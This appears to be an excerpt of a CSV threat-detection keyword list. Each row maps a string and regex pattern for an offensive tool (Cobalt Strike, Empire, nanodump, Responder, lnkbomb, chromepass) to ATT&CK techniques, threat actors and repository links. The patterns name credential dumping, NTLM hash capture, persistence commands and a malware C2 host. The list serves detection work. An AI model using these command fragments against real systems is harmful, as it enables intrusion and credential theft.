"*ListUsersLastPasswordChange*",".{0,1000}ListUsersLastPasswordChange.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","AD Enumeration","7","1","79","8","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z","51120"
"*ListUsersNoPasswordRequired*",".{0,1000}ListUsersNoPasswordRequired.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","AD Enumeration","7","1","79","8","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z","51121"
"*ListUsersPasswordMustChange*",".{0,1000}ListUsersPasswordMustChange.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","AD Enumeration","7","1","79","8","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z","51122"
"*ListUsersPasswordNotChanged*",".{0,1000}ListUsersPasswordNotChanged.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","AD Enumeration","7","1","79","8","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z","51123"
"*litefuzz -lk -c*",".{0,1000}litefuzz\s\-lk\s\-c.{0,1000}","offensive_tool_keyword","litefuzz","A multi-platform fuzzer for poking at userland binaries and servers","T1587.004","TA0009","N/A","N/A","Exploitation tool","https://github.com/sec-tools/litefuzz","1","0","N/A","N/A","7","1","68","9","2024-09-15T22:43:02Z","2021-09-17T14:40:07Z","51124"
"*litefuzz -s -a *",".{0,1000}litefuzz\s\-s\s\-a\s.{0,1000}","offensive_tool_keyword","litefuzz","A multi-platform fuzzer for poking at userland binaries and servers","T1587.004","TA0009","N/A","N/A","Exploitation tool","https://github.com/sec-tools/litefuzz","1","0","N/A","N/A","7","1","68","9","2024-09-15T22:43:02Z","2021-09-17T14:40:07Z","51125"
"*litefuzz* -l -c*",".{0,1000}litefuzz.{0,1000}\s\-l\s\-c.{0,1000}","offensive_tool_keyword","litefuzz","A multi-platform fuzzer for poking at userland binaries and servers","T1587.004","TA0009","N/A","N/A","Exploitation tool","https://github.com/sec-tools/litefuzz","1","0","N/A","N/A","7","1","68","9","2024-09-15T22:43:02Z","2021-09-17T14:40:07Z","51126"
"*litefuzz.py *",".{0,1000}litefuzz\.py\s.{0,1000}","offensive_tool_keyword","litefuzz","A multi-platform fuzzer for poking at userland binaries and servers","T1587.004","TA0009","N/A","N/A","Exploitation tool","https://github.com/sec-tools/litefuzz","1","0","N/A","N/A","7","1","68","9","2024-09-15T22:43:02Z","2021-09-17T14:40:07Z","51127"
"*litefuzz\fuzz.py*",".{0,1000}litefuzz\\fuzz\.py.{0,1000}","offensive_tool_keyword","litefuzz","A multi-platform fuzzer for poking at userland binaries and servers","T1587.004","TA0009","N/A","N/A","Exploitation tool","https://github.com/sec-tools/litefuzz","1","0","N/A","N/A","7","1","68","9","2024-09-15T22:43:02Z","2021-09-17T14:40:07Z","51128"
"*Live Dump Capture Dump Data API ended. NT Status: STATUS_SUCCESS.*",".{0,1000}Live\sDump\sCapture\sDump\sData\sAPI\sended\.\sNT\sStatus\:\sSTATUS_SUCCESS\..{0,1000}","offensive_tool_keyword","PPLSystem","creates a livedump of the machine through NtDebugSystemControl to extract the COM secret and context, to then inject inside this process.","T1003.002","TA0006","N/A","N/A","Credential Access","https://github.com/Slowerzs/PPLSystem","1","0","N/A","N/A","10","2","190","23","2024-05-29T18:33:35Z","2024-05-22T17:48:49Z","51129"
"*livevnc.ngrok.app*",".{0,1000}livevnc\.ngrok\.app.{0,1000}","offensive_tool_keyword","Kematian Stealer","Fake WinRar site distributes malware (+stealer +miner +hvnc +ransomware) from GitHub","T1195 - T1566 - T1569 - T1106 - T1486 - T1113","TA0001 - TA0002 - TA0005 - TA0006 - TA0007 - TA0009 - TA0010 - TA0011 - TA0040 - TA0043","N/A","N/A","Malware","https://github[.]com/sap3r-encrypthub/encrypthub","1","1","#macos","N/A","10","7","N/A","N/A","N/A","N/A","51130"
"*lkarlslund/Adalanche*",".{0,1000}lkarlslund\/Adalanche.{0,1000}","offensive_tool_keyword","adalanche","Active Directory ACL Visualizer and Explorer - who's really Domain Admin?","T1484 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/lkarlslund/Adalanche","1","1","N/A","AD Enumeration","10","10","1908","184","2025-03-25T13:01:45Z","2020-10-07T10:07:22Z","51131"
"*lkarlslund/ldapnomnom*",".{0,1000}lkarlslund\/ldapnomnom.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","1","N/A","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","51132"
"*LKM_HACKING.html*",".{0,1000}LKM_HACKING\.html.{0,1000}","offensive_tool_keyword","Diamorphine","LKM rootkit for Linux Kernels","T1547.006 - T1548.002 - T1562.001 - T1027","TA0003 - TA0004 - TA0005 - TA0006 - TA0007","N/A","N/A","Persistence","https://github.com/m0nad/Diamorphine","1","0","#linux","N/A","10","10","1986","451","2023-09-20T10:56:06Z","2013-11-06T22:38:47Z","51134"
"*lkmRootkitmodified*",".{0,1000}lkmRootkitmodified.{0,1000}","offensive_tool_keyword","D3m0n1z3dShell","Demonized Shell is an Advanced Tool for persistence in linux","T1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037","TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/MatheuZSecurity/D3m0n1z3dShell","1","0","#linux","N/A","10","4","373","54","2025-01-05T13:56:51Z","2023-05-30T02:30:47Z","51135"
"*llehsrewop*",".{0,1000}llehsrewop.{0,1000}","offensive_tool_keyword","powershell","powershell obfuscations techniques observed by malwares - reversed powershell","T1021 - T1024 - T1027 - T1035 - T1059 - T1070","TA0001 - TA0002 - TA0003 - TA0005 - TA0006","Qakbot","N/A","Defense Evasion","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","51138"
"*llkat/rsockstun*",".{0,1000}llkat\/rsockstun.{0,1000}","offensive_tool_keyword","rsockstun","reverse socks tunneler with ntlm and proxy support","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","COZY BEAR","C2","https://github.com/llkat/rsockstun","1","1","N/A","N/A","10","10","53","22","2022-08-09T09:25:50Z","2018-10-17T09:51:11Z","51139"
"*-llmnr -spn '*cifs* -secrets*",".{0,1000}\-llmnr\s\-spn\s\'.{0,1000}cifs.{0,1000}\s\-secrets.{0,1000}","offensive_tool_keyword","KrbRelay","Relaying 3-headed dogs. More details at https://googleprojectzero.blogspot.com/2021/10/windows-exploitation-tricks-relaying.html and https://googleprojectzero.blogspot.com/2021/10/using-kerberos-for-authentication-relay.html","T1212 - T1558 - T1550","TA0001 - TA0004 -TA0006","N/A","Dispossessor","Exploitation tool","https://github.com/cube0x0/KrbRelay","1","0","N/A","N/A","N/A","10","907","125","2022-05-29T09:45:03Z","2022-02-14T08:21:57Z","51140"
"*LLMNR.py*",".{0,1000}LLMNR\.py.{0,1000}","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011 - T1040","TA0011 - TA0006 - TA0007","N/A","Lazarus Group - APT28 - FANCY BEAR - EMBER BEAR","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","1","N/A","N/A","N/A","10","4656","1722","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z","51141"
"*llmnr_sniffer.py*",".{0,1000}llmnr_sniffer\.py.{0,1000}","offensive_tool_keyword","DDSpoof","DDSpoof is a tool that enables DHCP DNS Dynamic Update attacks against Microsoft DHCP servers in AD environments.","T1557 - T1584 - T1203","TA0005 - TA0003 TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/akamai/DDSpoof","1","1","N/A","N/A","9","2","122","13","2024-04-12T22:06:02Z","2023-12-14T06:47:45Z","51142"
"*LLMNRSpoofer*",".{0,1000}LLMNRSpoofer.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","51143"
"*LLMNRSpoofer*",".{0,1000}LLMNRSpoofer.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","51144"
"*llsrpc_##*",".{0,1000}llsrpc_\#\#.{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","N/A","10","10","444","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z","51145"
"*LMGsec/o365creeper*",".{0,1000}LMGsec\/o365creeper.{0,1000}","offensive_tool_keyword","o365creeper","Python script that performs email address validation against Office 365 without submitting login attempts","T1592.002 - T1596","TA0007","N/A","N/A","Discovery","https://github.com/LMGsec/o365creeper","1","1","N/A","N/A","N/A","4","342","60","2020-08-07T17:40:41Z","2019-07-12T21:32:05Z","51146"
"*lmhash*aad3b435b51404eeaad3b435b51404ee*",".{0,1000}lmhash.{0,1000}aad3b435b51404eeaad3b435b51404ee.{0,1000}","offensive_tool_keyword","pywhisker","Python version of the C# tool for Shadow Credentials attacks","T1552.001 - T1136 - T1098","TA0003 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/pywhisker","1","0","N/A","N/A","10","8","712","89","2025-04-21T16:53:22Z","2021-07-21T19:20:00Z","51147"
"*ln -s /run/systemd/system/generator.service /run/systemd/system/multi-user.target.wants/generator.service*",".{0,1000}ln\s\-s\s\/run\/systemd\/system\/generator\.service\s\/run\/systemd\/system\/multi\-user\.target\.wants\/generator\.service.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","51152"
"*L'n', L't', L'd', L'l', L'l', L'.', L'd', L'l', L'l', L'\0'*",".{0,1000}L\'n\',\sL\'t\',\sL\'d\',\sL\'l\',\sL\'l\',\sL\'\.\',\sL\'d\',\sL\'l\',\sL\'l\',\sL\'\\0\'.{0,1000}","offensive_tool_keyword","LetMeowIn","A sophisticated covert Windows-based credential dumper using C++ and MASM x64.","T1003 - T1055.011 - T1148","TA0006","N/A","N/A","Credential Access","https://github.com/Meowmycks/LetMeowIn","1","0","N/A","N/A","10","5","401","70","2024-07-08T15:58:37Z","2024-04-09T16:33:27Z","51154"
"*lnkbomb.py *",".{0,1000}lnkbomb\.py\s.{0,1000}","offensive_tool_keyword","lnkbomb","Malicious shortcut generator for collecting NTLM hashes from insecure file shares.","T1023.003 - T1557.002 - T1046","TA0008 - TA0006","N/A","N/A","Credential Access","https://github.com/dievus/lnkbomb","1","0","N/A","N/A","10","4","327","58","2024-10-22T17:51:10Z","2022-01-03T04:17:11Z","51157"
"*lnkbomb-1.0.zip*",".{0,1000}lnkbomb\-1\.0\.zip.{0,1000}","offensive_tool_keyword","lnkbomb","Malicious shortcut generator for collecting NTLM hashes from insecure file shares.","T1023.003 - T1557.002 - T1046","TA0008 - TA0006","N/A","N/A","Credential Access","https://github.com/dievus/lnkbomb","1","1","N/A","N/A","10","4","327","58","2024-10-22T17:51:10Z","2022-01-03T04:17:11Z","51158"
"*lnk-generate.py --host * --type ntlm --output *.lnk*",".{0,1000}lnk\-generate\.py\s\-\-host\s.{0,1000}\s\-\-type\sntlm\s\-\-output\s.{0,1000}\.lnk.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","51159"
"*lnkup.py --*",".{0,1000}lnkup\.py\s\-\-.{0,1000}","offensive_tool_keyword","LNKUp","Generates malicious LNK file payloads for data exfiltration","T1023.003 - T1048 - T1041 - T1204","TA0010","N/A","N/A","Data Exfiltration","https://github.com/Plazmaz/LNKUp","1","0","N/A","N/A","10","4","384","54","2017-08-21T22:58:13Z","2017-08-09T16:18:07Z","51160"
"*lnx_keylogger.py*",".{0,1000}lnx_keylogger\.py.{0,1000}","offensive_tool_keyword","C2_Server","C2 server to connect to a victim machine via reverse shell","T1090 - T1090.001 - T1071 - T1071.001","TA0011 ","N/A","N/A","C2","https://github.com/reveng007/C2_Server","1","1","N/A","N/A","10","10","54","18","2022-02-27T02:00:02Z","2021-03-05T12:35:45Z","51161"
"*load aggressor script*",".{0,1000}load\saggressor\sscript.{0,1000}","offensive_tool_keyword","cobaltstrike","MemReader Beacon Object File will allow you to search and extract specific strings from a target process memory and return what is found to the beacon output","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trainr3kt/MemReader_BoF","1","0","N/A","N/A","10","10","46","6","2023-12-05T23:25:22Z","2021-04-21T20:51:25Z","51162"
"*load incognito*",".{0,1000}load\sincognito.{0,1000}","offensive_tool_keyword","metasploit","metasploit command lines patterns","T1573.002  -  T1021","TA0001 - TA0002 - TA0003","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Exploitation tool","N/A","1","0","N/A","Incognito","10","10","N/A","N/A","N/A","N/A","51163"
"*load kiwi*",".{0,1000}load\skiwi.{0,1000}","offensive_tool_keyword","metasploit","metasploit command lines patterns","T1573.002  -  T1021","TA0001 - TA0002 - TA0003","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Exploitation tool","N/A","1","0","N/A","Mimikatz","10","10","N/A","N/A","N/A","N/A","51164"
"*load mimikatz windbg extension, extracts credential from crash dump*",".{0,1000}load\smimikatz\swindbg\sextension,\sextracts\scredential\sfrom\scrash\sdump.{0,1000}","offensive_tool_keyword","Forensike","Remotely dump NT hashes through Windows Crash dumps","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/bmarchev/Forensike","1","0","N/A","N/A","10","1","27","3","2024-10-29T00:13:50Z","2024-02-01T13:52:55Z","51165"
"*Load the passwords from another Windows user or external drive*",".{0,1000}Load\sthe\spasswords\sfrom\sanother\sWindows\suser\sor\sexternal\sdrive.{0,1000}","offensive_tool_keyword","chromepass","ChromePass is a small password recovery tool for Windows that allows you to view the user names and passwords stored by Google Chrome Web browser. For each password entry. the following information is displayed: Origin URL. Action URL. User Name Field. Password Field. User Name. Password. and Created Time. It allows you to get the passwords from your current running system. or from a user profile stored on external drive.","T1003 - T1021 - T1056 - T1110 - T1212 - T1552","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","GoGoogle - GOBLIN PANDA - Loki","Credential Access","https://www.nirsoft.net/utils/chromepass.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","51166"
"*Load the passwords of the current logged-on user*",".{0,1000}Load\sthe\spasswords\sof\sthe\scurrent\slogged\-on\suser.{0,1000}","offensive_tool_keyword","chromepass","ChromePass is a small password recovery tool for Windows that allows you to view the user names and passwords stored by Google Chrome Web browser. For each password entry. the following information is displayed: Origin URL. Action URL. User Name Field. Password Field. User Name. Password. and Created Time. It allows you to get the passwords from your current running system. or from a user profile stored on external drive.","T1003 - T1021 - T1056 - T1110 - T1212 - T1552","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","GoGoogle - GOBLIN PANDA - Loki","Credential Access","https://www.nirsoft.net/utils/chromepass.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","51167"
"*load_credentials(""credentials.txt"")*",".{0,1000}load_credentials\(\""credentials\.txt\""\).{0,1000}","offensive_tool_keyword","ShellServe","Multi-client network fileserver with integrated shell functionality crafted in C using system calls for efficient and direct file and command processing","T1059 - T1505 - T1046 - T1569","TA0002 - TA0007 - TA0003","N/A","N/A","Data Exfiltration","https://github.com/7etsuo/ShellServe","1","0","N/A","N/A","6","","N/A","","","","51168"
"*load_sc.exe *.bin*",".{0,1000}load_sc\.exe\s.{0,1000}\.bin.{0,1000}","offensive_tool_keyword","cobaltstrike","POC tool to convert CobaltStrike BOF files to raw shellcode","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/FalconForceTeam/BOF2shellcode","1","0","N/A","N/A","10","10","193","28","2021-11-05T18:37:53Z","2021-11-05T14:29:57Z","51169"
"*load_ssp *.dll*",".{0,1000}load_ssp\s.{0,1000}\.dll.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","Dispossessor","Credential Access","https://github.com/fortra/nanodump","1","0","N/A","N/A","10","10","1918","249","2024-09-17T22:58:11Z","2021-11-10T18:28:15Z","51170"
"*load_ssp.x64.exe *.dll*",".{0,1000}load_ssp\.x64\.exe\s.{0,1000}\.dll.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","Dispossessor","Credential Access","https://github.com/fortra/nanodump","1","0","N/A","N/A","10","10","1918","249","2024-09-17T22:58:11Z","2021-11-10T18:28:15Z","51171"
"*Load-BeaconParameters*",".{0,1000}Load\-BeaconParameters.{0,1000}","offensive_tool_keyword","cobaltstrike","Load any Beacon Object File using Powershell!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/airbus-cert/Invoke-Bof","1","1","N/A","N/A","10","10","250","35","2021-12-09T15:10:41Z","2021-12-09T15:09:22Z","51172"
"*Load-BetterXencrypt* ",".{0,1000}Load\-BetterXencrypt.{0,1000}\s","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","0","N/A","N/A","9","6","559","81","2023-04-21T12:49:37Z","2021-04-13T10:22:05Z","51173"
